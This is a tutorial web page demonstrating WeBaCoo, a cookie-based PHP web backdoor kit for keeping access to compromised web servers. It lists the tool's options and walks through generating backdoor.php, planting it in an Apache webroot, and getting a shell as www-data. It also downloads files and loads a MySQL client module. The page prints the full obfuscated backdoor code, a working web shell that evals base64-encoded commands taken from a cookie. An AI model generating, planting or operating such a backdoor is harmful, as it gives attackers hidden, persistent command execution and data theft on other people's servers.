Webacoo

Description

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server…

Usage

Syntax

webacoo [options]

Options

  -g		Generate backdoor code (-o is required)

  -f FUNCTION	PHP System function to use
	FUNCTION
		1: system 	(default)
		2: shell_exec
		3: exec
		4: passthru
		5: popen

  -o OUTPUT	Generated backdoor output filename

  -r 		Return un-obfuscated backdoor code

  -t		Establish remote "terminal" connection (-u is required)

  -u URL	Backdoor URL

  -e CMD	Single command execution mode (-t and -u are required)

  -m METHOD	HTTP method to be used (default is "GET")

  -c C_NAME	Cookie name (default: "M-cookie")

  -d DELIM	Delimiter (default: New random for each request)

  -a AGENT	HTTP header user-agent (default exist)

  -p PROXY	Use proxy (tor, ip:port or user:pass:ip:port)

  -v LEVEL	Verbose level
	LEVEL
		0: no additional info (default)
		1: print HTTP headers
		2: print HTTP headers + data

  -l LOG	Log activity to file

  -h		Display help and exit

  update	Check for updates and apply if any

Example

cyborg@cyborg:~$ sudo webacoo -g -o backdoor.php

	WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
	Copyright (C) 2011-2012 Anestis Bechtsoudis
	{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Backdoor file "backdoor.php" created.

Now Start the Apache server :

cyborg@cyborg:~$ sudo service apache2 start
[sudo] password for cyborg: 
 * Starting web server apache2                                                AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message

Check whether file is there or not : 

cyborg@cyborg:~$ ls
backdoor.php  Documents  examples.desktop  Pictures  Videos
Desktop       Downloads  Music             Public

Copy file to vulnerable server in this case we use our apache server (/var/www) :

cyborg@cyborg:~$ sudo cp backdoor.php /var/www/html

Now connect to the file hosted on server , in this case our localhost :

cyborg@cyborg:~$ sudo webacoo -t -u http://127.0.0.1/backdoor.php

	WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
	Copyright (C) 2011-2012 Anestis Bechtsoudis
	{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.

webacoo$

Check file using ls:

webacoo$ ls      
backdoor.php
img
index.html
rips

We can view the files :

webacoo$ cat index.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works</title>
</head>
  <body>
    <div class="main_page">
      <div class="page_header floating_element">
        <img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/>
        <span class="floating_element">
          Apache2 Ubuntu Default Page
        </span>
      </div>
 </body>
</html>

webacoo$ cat backdoor.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

Load the modules :

webacoo$ load
Currently available extension modules:
o MySQL-CLI: MySQL Command Line Module
    mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

o PSQL-CLI: Postgres Command Line Module
    psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

o Upload: File Upload Module
    upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

o Download: File Download Module
    download <remote_file>                   (ex. 'download config.php')

o Stealth: Enhance Stealth Module
    stealth <webroot_dir>                 (ex. 'stealth /var/www/html')

[*] Type the module name with the correct args.

>

Download Some Files :

> download index.html 
[*] Checking for 'xxd' tool.
[*] Proceed to download using 'xxd' tool.

[*] Retrieving 0-1000 bytes of remote file.
[*] Retrieving 1000-2000 bytes of remote file.
[*] Retrieving 2000-3000 bytes of remote file.
[*] Retrieving 3000-4000 bytes of remote file.
[*] Retrieving 4000-5000 bytes of remote file.
[*] Retrieving 5000-6000 bytes of remote file.
[*] Retrieving 6000-7000 bytes of remote file.


[+] File successfully downloaded at current directory.
[*] Download module unloaded.

Load Modules :

webacoo$ load
Currently available extension modules:
o MySQL-CLI: MySQL Command Line Module
    mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

o PSQL-CLI: Postgres Command Line Module
    psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

o Upload: File Upload Module
    upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

o Download: File Download Module
    download <remote_file>                   (ex. 'download config.php')

o Stealth: Enhance Stealth Module
    stealth <webroot_dir>                 (ex. 'stealth /var/www/html')

[*] Type the module name with the correct args.

> 

Can also use Mysql-cli :

> mysql-cli http://127.0.0.1 admin password
[+] mysql-cli module successfully loaded.
[*] Type 'unload'  to unload the module and return to the original cmd.

mysql-cli>

 

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?